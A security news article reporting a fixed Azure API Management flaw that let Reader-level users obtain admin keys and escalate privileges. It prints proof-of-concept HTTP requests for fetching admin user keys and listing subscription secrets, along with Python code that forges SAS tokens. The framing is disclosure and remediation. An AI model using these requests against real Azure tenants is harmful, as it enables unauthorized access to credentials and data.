Cyber Security News

Azure API Management Vulnerability Let Attackers Escalate Privileges

A vulnerability in Azure API Management (APIM) has been identified. It allows attackers to escalate privileges and access sensitive information.

This issue arises from a flaw in the Azure Resource Manager (ARM) API, which permits unauthorized access to critical resources.

This article delves into the specifics of the vulnerability, its implications, and the steps taken to mitigate the risk.

Understanding the ARM API Vulnerability

The Azure Resource Manager (ARM) API manages Azure resources, including APIM instances.

When users with Reader permissions access an APIM resource, the ARM API typically restricts certain actions, as a report by BinarySecurity.

Decoding Compliance: What CISOs Need to Know – Join Free Webinar

Generating another key for it, which can not be done by users with “reader”-access.

However, older versions of the ARM API allowed users with Reader access to view all subscription keys, read client credentials of identity provider service principals, and access keys for the Direct Management API.

The bug is as simple as finding the right ARM API endpoint and calling it with “Reader”-privileges.

To address these issues, Microsoft introduced a feature to enforce a minimum ARM API version, thereby blocking older, vulnerable versions.

By setting this restriction to an API version newer than 2020, users with Reader access are prevented from viewing subscription keys and other sensitive information.

Despite these measures, a bug bypassed these restrictions by allowing access to admin user keys.

The Direct Management API: A Closer Look

The Direct Management API is a crucial component of an APIM instance. It enables operations on entities such as users, groups, products, and subscriptions.

An Admin user is created with extensive permissions over these entities by default. The vulnerability lies in the ability of users with Reader privileges to exploit an overlooked ARM API endpoint and gain unauthorized access.

Here is an example of how attackers could exploit this vulnerability:

GET /subscriptions/<subscription>/resourceGroups/<resource_group>/providers/Microsoft.ApiManagement/service/<instance_name>/users/1/keys?api-version=2023-03-01-preview HTTP/2
Host: management.azure.com
Authorization: Bearer <legitimate_arm_bearer_token>

This request allows attackers to retrieve admin user keys and generate Shared Access Signatures (SAS), granting further access to sensitive data.

Demonstrating the Exploit

The vulnerability can be demonstrated by accessing admin user keys and generating SAS tokens.

These tokens can be used to interact with the APIM Management API and perform unauthorized actions:

def get_expiry(self):
    return (datetime.datetime.utcnow() + datetime.timedelta(hours=24)).strftime("%Y-%m-%dT%H:%M:%S.0000000Z")
def generate_apim_sas_token(self, key, uid, version=1):
    exp = self.get_expiry()
    if version == 1:
        message = f"uid={uid}&ex={exp}"
        message_to_sign = f"{uid}\n{exp}"
        signature = base64.b64encode(self.hmac_sha512(message_to_sign, key)).decode("utf-8")
        sas_token = f"{message}&sn={signature}"
    return sas_token

With these tokens, attackers can list subscription keys or identity provider keys:


/subscription/0/resourceGroups/0/providers/Microsoft.ApiManagement/service/0/subscriptions/<sub_id>/listSecrets?api-version=2022-08-01 HTTP/1.1
Host: <service>.management.azure-api.net
Authorization: SharedAccessSignature uid=1&ex=2024-05-01T00:00:00:000000Z&sn=ABCDEFG==
Content-Length: 0
Content-Type: application/json

Remediation and Future Precautions

Microsoft addressed this vulnerability by restricting the ARM API for users with Reader privileges.

The fix was implemented swiftly and retroactively applied to all APIM instances. Despite this resolution, similar vulnerabilities may emerge in the future.

To enhance security and build defense in depth, it is recommended that critical Azure resources be made private and accessible only from their virtual networks (VNETs).

Additionally, organizations should consider deploying security measures such as CI/CD runners to monitor and manage resource access.

The vulnerability was classified as having a vital severity level with a security impact of elevation of privilege.

As cloud environments evolve, vigilance and proactive security measures remain essential in protecting sensitive data and maintaining system integrity.

Simulating Cyberattack Scenarios With All-in-One Cybersecurity Platform – Watch Free Webinar

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

The Rise of AI-Generated Professional Headshots

It’s clear that a person’s reputation is increasingly influenced by their online presence, which spans…

13 hours ago

Hackers Abuse Google Ads To Attacking Graphic Design Professionals

Researchers identified a threat actor leveraging Google Search ads to target graphic design professionals, as…

15 hours ago

Hackers Using New IoT/OT Malware IOCONTROL To Control IP Cameras, Routers, PLCs, HMIs And Firewalls

Recent cyberattacks targeting critical infrastructure, including fuel management systems and water treatment facilities in Israel…

16 hours ago

Hackers Exploiting Apache Struts2 Vulnerability to Upload Malicious Payloads

Hackers have begun exploiting a newly discovered vulnerability in Apache Struts2, a widely used open-source…

16 hours ago

Hackers Weaponizing Microsoft Teams to Gain Remote Access

Recent cybersecurity research has uncovered a concerning trend where hackers are exploiting Microsoft Teams to…

17 hours ago

“Password Era is Ending,” Microsoft to Delete 1 Billion Passwords

Microsoft has announced that it is currently blocking an astounding 7,000 password attacks every second,…

3 days ago